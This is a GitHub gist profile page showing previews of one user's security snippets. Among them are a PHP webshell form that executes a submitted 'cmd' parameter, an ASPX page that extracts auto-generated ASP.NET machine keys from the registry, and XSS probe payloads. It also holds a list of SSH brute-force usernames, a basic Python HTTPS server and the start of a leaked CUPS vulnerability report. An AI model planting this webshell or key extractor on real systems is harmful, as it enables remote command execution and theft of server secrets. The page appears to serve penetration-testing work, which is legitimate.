Skip to content

Instantly share code, notes, and snippets.

View JeffreyShran's full-sized avatar
:octocat:

Dave Hanson JeffreyShran

:octocat:
28 followers · 252 following
View GitHub Profile
@JeffreyShran
JeffreyShran / easy-simple-php-webshell.php
Created February 2, 2022 09:12 — forked from joswr1ght/easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@JeffreyShran
JeffreyShran / machineKeyFinder.aspx
Created March 30, 2022 10:00 — forked from irsdl/machineKeyFinder.aspx
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
@JeffreyShran
JeffreyShran / simple-https-server.py
Created May 4, 2022 11:52 — forked from DannyHinshaw/simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import http.server
@JeffreyShran
JeffreyShran / ssh-login-attempts-usernames
Created May 5, 2023 08:42 — forked from royra/ssh-login-attempts-usernames
.log
0
1
1234
12345
123456
18Renmeng
2
ACrenshaw
AGorg
@JeffreyShran
JeffreyShran / dompurify.js
Last active July 1, 2024 15:54
window.location.origin === "http://localhost";console.log("test");
@JeffreyShran
JeffreyShran / domain.js
Created July 1, 2024 14:00
alert(document.domain);
@JeffreyShran
JeffreyShran / cups-browsed.md
Created September 27, 2024 05:37 — forked from stong/cups-browsed.md
CUPS disclosure leaked online. Not my report. The original author is @evilsocket

Original report

  • Affected Vendor: OpenPrinting
  • Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
  • Affected Version: All versions <= 2.0.1 (latest release) and master.
  • Significant ICS/OT impact? no
  • Reporter: Simone Margaritelli [[email protected]]
  • Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed: